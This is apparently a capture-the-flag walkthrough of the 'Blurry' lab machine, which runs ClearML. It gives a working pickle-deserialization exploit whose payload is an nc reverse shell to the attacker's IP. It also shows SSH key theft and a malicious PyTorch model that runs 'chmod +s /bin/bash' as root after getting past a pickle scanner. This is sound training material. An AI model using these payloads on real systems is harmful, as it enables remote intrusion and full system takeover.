Report



We begin with the usual nmap scan.

    nmap $ip -sV

We find two open ports:

- 22: SSH
- 80: HTTP server
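As a rough cross-check of the scan result, the same two ports can be probed with a plain TCP connect. This is a minimal sketch, not a replacement for nmap: the helper names `is_port_open` and `scan` are made up for illustration, and the address in the usage comment is a placeholder.

```python
import socket


def is_port_open(host: str, port: int, timeout: float = 2.0) -> bool:
    """Return True if a TCP connection to host:port succeeds within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers refused connections, timeouts and unreachable hosts.
        return False


def scan(host: str, ports) -> dict:
    """Map each port to True (open) or False (closed or filtered)."""
    return {port: is_port_open(host, port) for port in ports}


# Usage (placeholder address, replace with the target IP):
# print(scan("10.0.0.1", (22, 80)))
```

Unlike `nmap -sV`, this only tells us whether the port accepts connections; it does not identify the service behind it.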



To interact with the HTTP server, we use the browser.



We are redirected to the subdomain http://app.blurry.htb/, which we add to /etc/hosts along with the root domain.

We are welcomed with this index page.



We can see that the software in use is ClearML. We can enter our name and start exploring the projects shown.





We can follow these instructions to set up ClearML on our local machine.

It seems that we need an access key and a secret to complete authentication.

We can add new credentials.



We get the secret and the key.





We also get an error.

Looking at this configuration snippet:

    api {
        web_server: http://app.blurry.htb
        api_server: http://api.blurry.htb
        files_server: http://files.blurry.htb
        credentials {
            "access_key" = "G7GGHKAY33BFA7J1HHVK"
            "secret_key" = "46D6B51Wu6Quw97l3O4HFhqwRcIn8tz1YooeIGUj07TWL9eHcd"
        }
    }



We can see that it refers to multiple vhosts that we did not add to our hosts file. We add them and retry the authentication.

It is successful.
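For reference, the hosts entry covering the root domain and the three vhosts from the configuration can be built with a small helper. This is only a sketch: `hosts_line` is a hypothetical helper name and `TARGET_IP` is a placeholder, not the real address of the machine.

```python
def hosts_line(ip: str, names) -> str:
    """Build a single /etc/hosts entry mapping one IP to several names."""
    return f"{ip}\t{' '.join(names)}"


# Placeholder address (assumption); substitute the target's real IP.
TARGET_IP = "10.0.0.1"

# Root domain plus the vhosts referenced by the ClearML configuration.
VHOSTS = ["blurry.htb", "app.blurry.htb", "api.blurry.htb", "files.blurry.htb"]

print(hosts_line(TARGET_IP, VHOSTS))
```

The printed line can then be appended to /etc/hosts with root privileges.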



We can add a new project.

After looking for exploits, we found this link, which references a vulnerability leading to RCE through insecure deserialization with the pickle library. An attacker can create a pickle file containing arbitrary code and upload it as an artifact to a project via the API. When a user calls the get method of the Artifact class to download the file and load it into memory, the pickle file is deserialized on their system, running any arbitrary code it contains.
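The mechanism behind this class of bug can be shown with a harmless, standard-library-only sketch. The class name `Demo` and the expression it evaluates are illustrative assumptions; nothing here touches ClearML. The point is that `__reduce__` lets an object tell pickle which callable to invoke at load time.

```python
import pickle


class Demo:
    """Harmless stand-in for a malicious artifact object."""

    def __reduce__(self):
        # Instead of storing the object's state, pickle records
        # "call eval('6 * 7')" and replays that call when loading.
        return (eval, ("6 * 7",))


blob = pickle.dumps(Demo())

# The callable runs here, during deserialization, on the loading side.
result = pickle.loads(blob)
print(result)  # 42
```

The loader never gets a `Demo` instance back; it gets whatever the recorded callable returned. Swapping `eval` for `os.system` is what turns this into command execution.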



We need to find a script that deserializes artifacts and is executed automatically by a system administrator.

We found the Review JSON Artifacts task, which is being executed and contains the following code.

    #!/usr/bin/python3

    from clearml import Task
    from multiprocessing import Process
    from clearml.backend_api.session.client import APIClient

    def process_json_artifact(data, artifact_name):
        """
        Process a JSON artifact represented as a Python dictionary.
        Print all key-value pairs contained in the dictionary.
        """
        print(f"[+] Artifact '{artifact_name}' Contents:")
        for key, value in data.items():
            print(f" - {key}: {value}")

    def process_task(task):
        artifacts = task.artifacts

        for artifact_name, artifact_object in artifacts.items():
            data = artifact_object.get()

            if isinstance(data, dict):
                process_json_artifact(data, artifact_name)
            else:
                print(f"[!] Artifact '{artifact_name}' content is not a dictionary.")

    def main():
        review_task = Task.init(project_name="Black Swan",
                                task_name="Review JSON Artifacts",
                                task_type=Task.TaskTypes.data_processing)

        # Retrieve tasks tagged for review
        tasks = Task.get_tasks(project_name='Black Swan', tags=["review"], allow_archived=False)

        if not tasks:
            print("[!] No tasks up for review.")
            return

        threads = []
        for task in tasks:
            print(f"[+] Reviewing artifacts from task: {task.name} (ID: {task.id})")
            p = Process(target=process_task, args=(task,))
            p.start()
            threads.append(p)
            task.set_archived(True)

        for thread in threads:
            thread.join(60)
            if thread.is_alive():
                thread.terminate()

        # Mark the ClearML task as completed
        review_task.close()

    def cleanup():
        client = APIClient()
        tasks = client.tasks.get_all(
            system_tags=["archived"],
            only_fields=["id"],
            order_by=["-last_update"],
            page_size=100,
            page=0,
        )

        # delete and cleanup tasks
        for task in tasks:
            # noinspection PyBroadException
            try:
                deleted_task = Task.get_task(task_id=task.id)
                deleted_task.delete(
                    delete_artifacts_and_models=True,
                    skip_models_used_by_other_tasks=True,
                    raise_on_error=False
                )
            except Exception as ex:
                continue

    if __name__ == "__main__":
        main()
        cleanup()

Based on this script and the vulnerability described in the link above, we can write a Python exploit. The review script calls get() on every artifact of tasks in the Black Swan project tagged review, so our task must use that project and tag.

    import os
    from clearml import Task

    class RunCommand:
        def __reduce__(self):
            cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.5 4444 >/tmp/f"
            return (os.system, (cmd,))

    command = RunCommand()

    task = Task.init(project_name="Black Swan",
                     task_name="xtromera-task",
                     tags=["review"],
                     task_type=Task.TaskTypes.data_processing,
                     output_uri=True)

    task.upload_artifact(name="axura_artifact",
                         artifact_object=command,
                         retries=2,
                         wait_on_upload=True)

    task.execute_remotely(queue_name='default')



We get a connection to our listener and we are connected as the user jippity.



We can upgrade the shell by copying the user's id_rsa file to our machine.

We save the file, restrict its permissions, and connect over SSH.



Next, we check the sudo permissions.

We can see that the user can run the following command as root.

The /usr/bin/evaluate_model script is as follows:

    #!/bin/bash
    # Evaluate a given model against our proprietary dataset.
    # Security checks against model file included.

    if [ "$#" -ne 1 ]; then
        /usr/bin/echo "Usage: $0 <path_to_model.pth>"
        exit 1
    fi

    MODEL_FILE="$1"
    TEMP_DIR="/opt/temp"
    PYTHON_SCRIPT="/models/evaluate_model.py"

    /usr/bin/mkdir -p "$TEMP_DIR"

    file_type=$(/usr/bin/file --brief "$MODEL_FILE")

    # Extract based on file type
    if [[ "$file_type" == *"POSIX tar archive"* ]]; then
        # POSIX tar archive (older PyTorch format)
        /usr/bin/tar -xf "$MODEL_FILE" -C "$TEMP_DIR"
    elif [[ "$file_type" == *"Zip archive data"* ]]; then
        # Zip archive (newer PyTorch format)
        /usr/bin/unzip -q "$MODEL_FILE" -d "$TEMP_DIR"
    else
        /usr/bin/echo "[!] Unknown or unsupported file format for $MODEL_FILE"
        exit 2
    fi

    /usr/bin/find "$TEMP_DIR" -type f \( -name "*.pkl" -o -name "pickle" \) -print0 | while IFS= read -r -d $'\0' extracted_pkl; do
        fickling_output=$(/usr/local/bin/fickling -s --json-output /dev/fd/1 "$extracted_pkl")

        if /usr/bin/echo "$fickling_output" | /usr/bin/jq -e 'select(.severity == "OVERTLY_MALICIOUS")' >/dev/null; then
            /usr/bin/echo "[!] Model $MODEL_FILE contains OVERTLY_MALICIOUS components and will be deleted."
            /bin/rm "$MODEL_FILE"
            break
        fi
    done

    /usr/bin/find "$TEMP_DIR" -type f -exec /bin/rm {} +
    /bin/rm -rf "$TEMP_DIR"

    if [ -f "$MODEL_FILE" ]; then
        /usr/bin/echo "[+] Model $MODEL_FILE is considered safe. Processing..."
        /usr/bin/python3 "$PYTHON_SCRIPT" "$MODEL_FILE"
    fi

Here is an explanation of the script:

- Argument Check: It verifies that exactly one argument (the model path) is provided. If not, it displays a usage message and exits.
- Variable Initialization: Sets paths for the model file, a temporary directory (`/opt/temp`), and a Python evaluation script (`evaluate_model.py`).
- Temporary Directory Creation: Creates the directory to store extracted model components.
- File Type Check:
  - Uses the `file` command to determine if the model file is a POSIX tar archive or a Zip archive. This distinction is made because different versions of PyTorch may store models in different formats.
  - Based on the type, it extracts the file accordingly into the temporary directory.
- Malicious Content Check:
  - Searches the extracted files for files named `*.pkl` or `pickle`, which are common names for serialized Python objects.
  - It uses `fickling` (a Python package for analyzing pickle files) with `jq` to parse the output and detect any signs of overtly malicious code. If detected, the script:
    - Logs a warning.
    - Deletes the model file to prevent it from being used further.
- Cleanup: Removes all files in the temporary directory and deletes the directory itself.
- Model Evaluation:
  - If the model file is deemed safe, the script runs the evaluation Python script (`evaluate_model.py`) using the provided model file.
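The checks described above can be approximated in Python to make the logic easier to follow. This is a sketch under assumptions, not the script's actual implementation: the function names are invented here, `zipfile`/`tarfile` detection only roughly matches what the `file` command reports, and the JSON shape is assumed to be a single object with a `severity` field, as the `jq` filter implies.

```python
import json
import tarfile
import zipfile
from pathlib import Path


def archive_kind(path):
    """Return 'zip', 'tar', or None, roughly like the script's `file` check."""
    if zipfile.is_zipfile(path):
        return "zip"
    if tarfile.is_tarfile(path):
        return "tar"
    return None


def find_pickles(directory):
    """List extracted files named '*.pkl' or exactly 'pickle'."""
    return sorted(
        p for p in Path(directory).rglob("*")
        if p.is_file() and (p.name.endswith(".pkl") or p.name == "pickle")
    )


def is_overtly_malicious(report_json: str) -> bool:
    """Mirror the jq filter: only the exact severity OVERTLY_MALICIOUS matches."""
    return json.loads(report_json).get("severity") == "OVERTLY_MALICIOUS"
```

Note that the model is deleted only when the reported severity is exactly `OVERTLY_MALICIOUS`. Any other severity value, and any pickle stored under a name the `find` pattern does not match, leaves the model file in place and it is passed to the evaluation script.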



To exploit this, we can create a .pth file, which is the PyTorch model format. To do so, we define a custom PyTorch model, inject our malicious payload, and save the model as a .pth file. We can use this payload.

    import torch
    import torch.nn as nn
    import os

    class EvilModel(nn.Module):
        def __init__(self):
            super(EvilModel, self).__init__()
            self.linear = nn.Linear(10, 1)

        def forward(self, xtromera):
            return self.linear(xtromera)

        def __reduce__(self):
            cmd = "chmod +s /bin/bash"
            return os.system, (cmd,)

    model = EvilModel()
    torch.save(model, 'xtromera.pth')
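As a side note, a `__reduce__` hook like the one in this payload leaves a recognizable trace in the pickle stream, which is the kind of signal static analyzers look at. The sketch below uses only the standard library and a benign stand-in class (`Marker` and `call_related_opcodes` are hypothetical names, and PyTorch is not involved); it walks the opcodes without ever unpickling the data.

```python
import pickle
import pickletools


class Marker:
    """Benign stand-in: __reduce__ asks the unpickler to call len('abc')."""

    def __reduce__(self):
        return (len, ("abc",))


def call_related_opcodes(data: bytes):
    """Return the opcodes that import or call objects, without unpickling."""
    interesting = {"GLOBAL", "STACK_GLOBAL", "REDUCE"}
    return [
        op.name
        for op, _arg, _pos in pickletools.genops(data)
        if op.name in interesting
    ]


ops = call_related_opcodes(pickle.dumps(Marker()))
print(ops)
```

An import opcode (`GLOBAL` or `STACK_GLOBAL`, depending on the pickle protocol) followed by `REDUCE` is how "import this callable and call it" is encoded; which callable is imported determines whether the pickle is harmless or dangerous.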

Run the payload



Now run the command as root.

    sudo /usr/bin/evaluate_model /models/xtromera.pth

The exploit was successful.

The machine was pwned successfully.